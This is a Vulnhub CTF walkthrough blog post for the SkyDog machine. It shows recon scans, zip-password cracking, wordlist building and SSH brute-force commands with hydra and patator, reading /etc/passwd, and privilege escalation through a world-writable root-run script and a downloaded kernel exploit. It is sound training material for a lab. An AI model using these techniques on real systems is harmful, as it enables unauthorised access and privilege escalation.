AAKASH CHOUDHARY

SkyDog CTF Vulnhub Series 1

Leave a Comment
Hi friends I am CodeNinja a.k.a Aakash Choudhary and today i solved another machine SkyDog CTF vulnhub machine which is 1st machine in 2 Series. And guess what ? I did 90% myself this time.

I learned a lot from this machine.
You can download this vulnhub machine from here -> https://www.vulnhub.com/entry/skydog-1,142/

So, lets start the writeup solution
===================================================================

ATTACKING IP: 192.168.56.130
VICTIM IP: 192.168.56.131


First starting with my keepnote screenshot




=================================================================

Ok,So i DIVIDE this section into ->


  1. FLAG 1
  2. FLAG 2
  3. FLAG 3
  4. FLAG 4
  5. FLAG 5
  6. FLAG 6
=================================================================

First lets see about Flags INSTRUCTIONS
=================================================================
Goal of Sky Dog Con CTF

The purpose of this CTF is to find all six flags hidden throughout the server by hacking network and system services. This can be achieved without hacking the VM file itself.


Flags

The six flags are in the form of flag{MD5 Hash} such as
      flag{1a79a4d60de6718e8e5b326e338ae533

  1. Flag #1 Home Sweet Home or (A Picture is Worth a Thousand Words)
  2. Flag #2 When do Androids Learn to Walk?
  3. Flag #3 Who Can You Trust?
  4. Flag #4 Who Doesn't Love a Good Cocktail  Party?
  5. Flag #5 Another Day at the Office
  6. Flag #6 Little Black Box


===================================================================


Flag #1 Home Sweet Home or (A Picture is Worth a Thousand Words)

First start from netdiscover and arp command to get host info

netdiscover -r 192.168.56.0/24


I got IP -> 192.168.56.131
Now next step to get MAC ADDRESS

arp-scan -l
 



So we got MAC ADDRESS ->

00:0c:29:30:9d:9b

MASSCAN

masscan --interface eth0 --router-mac 00-0c-29-30-9d-9b --wait 30 --rate 100000 -p0-65535 192.168.56.131

Result --->

Discovered open port 22/tcp on 192.168.56.131                
Discovered open port 80/tcp on 192.168.56.131

Now NMAP to get more info about PORTS

NMAP

nmap -A -sV -sS -p80,22 192.168.56.131



OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.57 seconds

So PORTS -> 80,22 open which is HTTP,SSH respectively

I noted down this in my keepnote

As HTTP Open so first start to browse website

When i open I saw this




Ok lets figure out source-codes,comments,robots.txt,and grab directories and this is usually basic steps to do while pentesting as ENUMERATION ENUMERATION and ENUMERATION is the essential for every pentester to get more information about TARGET


Also as that web page have an image file so just save that file and then using exiftool command examine that image file




We got our first Flag


flag{abc40a2d4e023b42bd1ff04891549ae2}  -> Welcome Home
I crack that Using online decoding


Flag #2 When do Androids Learn to Walk?

Androids hmm may be directories of androids. Lets check directories

First using nikto



2nd i checked robots.txt



GOT 2nd flag in robots.txt

 flag{cd4f10fcba234f0e8b2f60a490c306e6} --->  Bots


Flag #3 Who Can You Trust?

Trust ? hmm lets figure it out
trust can be related to Security

In security there is one word "Never trust Any forms of Inputs wheteher it is Client-Side or Server-Side


I check this -> /Setec/ directory ---> http://192.168.56.131/Setec/



TOO MANY SECRETS

hmm OK
Lets check its source code
view-source:http://192.168.56.131/Setec/


In terms of Trust i got this


Now i got this from above source code

Got http://192.168.56.131/Setec/Astronomy/ directory

I noted down it and checked





I downloaded Whistler.zip file and checked



Password hmm don't know password ? Lets figure it out. Till now what i got is i tried that as password but failed. Then using google i got to know password cracker for zip file -> fcrackzip

First i do man fcrackzip to know about this



Then i used it after understand it






Ok we got our 3rd FLAG :D


  • flag{1871a3c1da602bf471d3d76cc60cdb9b} --> yourmother


Flag #4 Who Doesn't Love a Good Cocktail  Party? 


Cocktail Party hmm

Remember that Whistler.zip file? Other than flag.txt file there was another file -> QuesttoFindCosmo.txt

now I read QuesttoFindCosmo.txt file

cat QuesttoFindCosmo.txt 
Time to break out those binoculars and start doing some OSINT
So it saying about OSINT

Now really interesting part comes. 

OSINT so its mean we have to use gather information from out source

I checked my notes again and got this from source code of
    • http://192.168.56.131/Setec/

"NSA-Agent-Abbott"; AKA Darth Vader

Lets GOOGLE about this



I got this result ---->  


After reading this i got this --->

1992 Sneakers NSA Agent Bernard Abbott

Oooohhh Sneakers

So now time is to get more information from that movie Sneakers

I again google about
  • "sneakers john earl jones coktail party"

Then i got this ->
www.thealmightyguru.com/Reviews/Sneakers/Docs/Sneakers-Script.txt

http://www.imdb.com/title/tt0105435/trivia


Ok now what to do ?

Might be genrate wordlists of those two resources
I googled this ->

List of kali linux tools to generate wordlists and i got to know about

cewl and crunch

Reading tutorial of crunch not so promosing for me

so i choose cewl now. Now how to use it ? Using man command ofcourse


First using man command i got to know about cewl

CeWL  (Custom Word List generator) is a ruby app which spiders a given URL, up to a specified depth, and returns a list of words which can then be used for password crackers such as  John the Ripper. Optionally, CeWL can follow external links.

CeWL  can  also create a list of email addresses found in mailto links. These email addresses can be used as usernames in brute force actions


cewl --depth 1 http://www.imdb.com/title/tt0105435/trivia -w /root/Desktop/wordlists/imdb_skydog_wordlist_snickers.txt


When i used that command then very very very long waiting and no response

Then i use 2nd command and got quick response

cewl --depth 1 www.thealmightyguru.com/Reviews/Sneakers/Docs/Sneakers-Script.txt -w /root/Desktop/wordlists/script_skydog_wordlist_snickers.txt


Now after got result i confused what to do with these wordlists now ?

What bruteforce now ? We have no login details till now and i already cracked zip file so what to do now  ?

Then a thought came to my mind why not bruteforce for more directories ?May be we get another secrets reveal ?

So lets use dirb again


Ok now what

Just check that new directory


Now that directory --> 192.168.56.131/PlayTronics/ have two things

1. companytraffic.pcap file
2. flag.txt


Now we got these two details on those directories

one is FLAG  and one is companytraffic.pcap

i checked flag and got our 4th flag

cat flag.txt


  • flag{c07908a705c22922e6d416e0e1107d99}
After decode from online hash cracker it becomes  -->
  • flag{c07908a705c22922e6d416e0e1107d99} -> leroybrown


Ok now i noted this "leroybrown" in my keepnote

Now its time for 5th Flag now :D


Flag #5 Another Day at the Office
 


Now i read that pcap file ---> companytraffic.pcap

 know i can use wireshark to read pcap file but as a pentester or can say researcher we always getting this tip ->

"We should know various ways to do same task"

Like there is tcpdump , tcpick, tshark  too for same task

So i google now -> various ways to read pcap file

I got many results like ->

https://github.com/caesar0301/awesome-pcaptools

http://bikulov.org/blog/2012/11/03/tools-for-tracing-a-pcap-file-in-linux-bash/

https://www.blackbytes.info/2012/01/four-ways-to-extract-files-from-pcaps/

http://www.lovemytool.com/blog/2010/05/wireshark-and-tshark-decrypt-sample-capture-file-by-joke-snelders.html

So many new things i learned while reading those above resources

I downloaded chaosreader and used it

First about Chaosreader -->







Now just open that pcap file in wireshark and figuring out it


Then FOLLOW TCP STREAM


I got this interesting ->


GET /8Q3zbtBpxOHb.128.mp3?

A mp3 file. So does it contain clue or hint for next step ? Yes Lets download it

Now how to download it ? There is a way for this just see this

Click on -> File -> Export Objects -> HTTP

and then i saved that mp3 file as audio.mp3

OK now lets listen it

Its saying this

Hi, my name is Werner Brandes. My voice is my password. Verify me.

So i google about this and got this youtube

https://www.youtube.com/watch?v=-zVgWpVXb64

So now what i did is just saved that name

Also in that video that person using "Werner Brandes" 's voice to access something


Now i thought what to do with this ?  So i checked my notes to get more clue might be i am missing something..

I just checked my user details and then thought  as i got many user information why not try to use these username as SSH to get connect
Should i also use that Werner Brandes to connect SSH ? May be

Then i made usernames.txt file and password.txt file and used three things to crack SSH Login information
Though i had clue about that name werner brandes but i still made those files

1. First hyrdra

2. Second  msfconsole -> ssh login module

3. Patator and i loving it since i got to know about  this


Before using these 3 tools i first sharing my usernames list here which i saved same as password.txt
Mean both file have same names





Hydra


MSFCONSOLE






So we got ->
    username -> wernerbrandes
    password ->  leroybrown

Now lets use same ssh cracking using patator

PATATOR

patator ssh_login host=192.168.56.131 user=FILE0 0=/root/Desktop/wordlists/usernames.txt password=FILE1 1=/root/Desktop/wordlists/passwords.txt --max-retries 0  -x ignore:time=0-3



REALLY patator is very awesome and i am liking it very much

so wernerbrandes:leroybrown  is the username and password

In future i will make script for get clean output from patator results sure and google is the main source for this


Now lets use SSH to get connection


password -> leroybrown
Awesome  we got in :D



Awesome we got our 5th FLAG -->

flag{82ce8d8f5745ff6849fa7af1473c9b35}

After decode --->  Dr. Gunter Janek


Flag #6 Little Black Box
 

black box ? does it mean testing black box type ? Mean more enumeration. Just take time in privilege escalation

PRIVILEGE ESCALATION 

Now using cat /etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
mysql:x:102:106:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:103:107::/var/run/dbus:/bin/false
landscape:x:104:110::/var/lib/landscape:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
nemo:x:1000:1000:nemo,,,:/home/nemo:/bin/bash
wernerbrandes:x:1001:1001:Werner Brandes,,,:/home/wernerbrandes:/bin/bash

nemo another home user hmm
Then check first /var/www/html  directory

And very important thing i got ->



CongratulationsYouDidIt  <---- wow got it may be flag there ?
No but there is mp4 file ---->



So i tried a lot of times to download that file and in last i finally succeed



This is nothing just a Karate Kid movie mp4 video file

I wrote a c file for exploit [all right all right i have an privilege escalation text file and there is little script for that purpose]

When i going to save then error came which was related to writable.

Mean we now have to find writable path

FIND WRITABLE PATH 

wernerbrandes@skydogctf:/$ find / -writable -type f 2>/dev/null | more

/lib/log/sanitizer.py
/proc/sys/kernel/ns_last_pid
/proc/1/task/1/attr/current
/proc/1/task/1/attr/exec
/proc/1/task/1/attr/fscreate
/proc/1/task/1/attr/keycreate
/proc/1/task/1/attr/sockcreate
/proc/1/attr/current
/proc/1/attr/exec
/proc/1/attr/fscreate
/proc/1/attr/keycreate
/proc/1/attr/sockcreate
/proc/2/task/2/attr/current
/proc/2/task/2/attr/exec
/proc/2/task/2/attr/fscreate
/proc/2/task/2/attr/keycreate
/proc/2/task/2/attr/sockcreate
/proc/2/attr/current
/proc/2/attr/exec
/proc/2/attr/fscreate
/proc/2/attr/keycreate
/proc/2/attr/sockcreate
/proc/3/task/3/attr/current


FIND <--- this is command to find files/directories in kali linux. And there is many options like type,exec,file,writable  etc etc

/     <----- This is root PATH mean we are finding our desire thing in main root path

-writable <--- we are finding writable path

-type  <--- type is using which type of file we are looking for like regular file,symbolic file,exe file etc

f <--  The type of file we are looking for REGULAR FILE

2>/dev/null  <-- Without using this we get our desire result too but with many errors like Access Denied.But when we use this command then that Access Denied Command surpass to /dev/null and we not see errors on output


NOW
I got very interesting file  ->  /lib/log/sanitizer.py



So a python file. what does it saying ?

Its actually removing files  from tmp directory

Lets check its permission ->
ls -la /lib/log/sanitizer.py 

-rwxrwxrwx 1 root root 96 Oct 27  2015 /lib/log/sanitizer.py

full permission   😮

also as this file removing tmp file and having full permission so its clear that its owned by root and can be run by root and this is what we want



So now use this as for advantage for ROOT ACCESS


ROOT ACCESS TIME

So we have to modify that python file so that we gain root access
Google -> using python to get root privileges

So here i googled a lot and not get desire result so 
Privilege Escalation to get ROOT  is the only part where i stucks many times. 

Lets take help now for the first time from writeups

So i will wrote every method here which i took help from other writeups 


METHOD 1



By changing this path we are giving maximum permissions to /bin/sh

THEN -> 





So finally cracked it :D

NOTE: also can use  /bin/dash  in place of /bin/sh

Now time for 2nd METHOD


METHOD 2

cat /etc/issue && uname -a
Ubuntu 14.04.3 LTS \n \l
Linux skydogctf 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

Google about 14.04 exploit i got this -> https://www.exploit-db.com/exploits/39166/

 i downloaded it  using 

wget https://www.exploit-db.com/download/39166/ 
Then


Now we have to transfer this file to victim machine

For this First -> 


Then Second ->


Finally we now again root with this simple METHOD   😀


Now time for method 3


METHOD 3

Now in this method we now again modify that python script 



Then run file



Meanwhile run netcat



And we got root :D Impressive

Just google about python code to understand more.
Its just use reverse connection


Now its final Method 4 time yeaaahhhhhhhh


METHOD 4


Herw what i did is I add the user wernerbrandes to sudoers: so that we gain root access

The  run it and wait for sometime

And boom awesome we root again now




FROM ALL 4 THOSE METHODS WE GOT FINAL FLAG :D

  • flag{b70b205c96270be6ced772112e7dd03f}

After decode it  -->  CongratulationsYouDitIt

So now we have all 6 Flags


EXTRA/Bonus

I also got another thing to read pcap file using google. And this is what i got -->


https://github.com/DanMcInerney/net-creds


net-creds <-- this is also use for capture pcap file

I downloaded it using
  • git clone https://github.com/DanMcInerney/net-creds.git
 Then

./net-creds.py -p /root/Desktop/pcapfile/companytraffic.pcap 

[192.168.2.223] GET cf-media.sndcdn.com/8Q3zbtBpxOHb.128.mp3?Policy=eyJTdGF0ZW1lbnQiOlt7IlJlc291cmNlIjoiKjovL2NmLW1...

Great and so simple

SUMMARY OF FLAGS ---> CongratulationsYouDidIt

Thanks for reading.Hope you also learned as i too learned

In last i want to say thanks to @jamesbower to make such awesome machine for us so that we learn and to vulnhub where all machines hosting for us so that we learn more and develop skills in penetration testing and in last thanks to others who post writeup/walkthrough so that every beginners learn

Thanks 😊

Next PostNewer Post Previous PostOlder Post Home

0 comments:

Post a Comment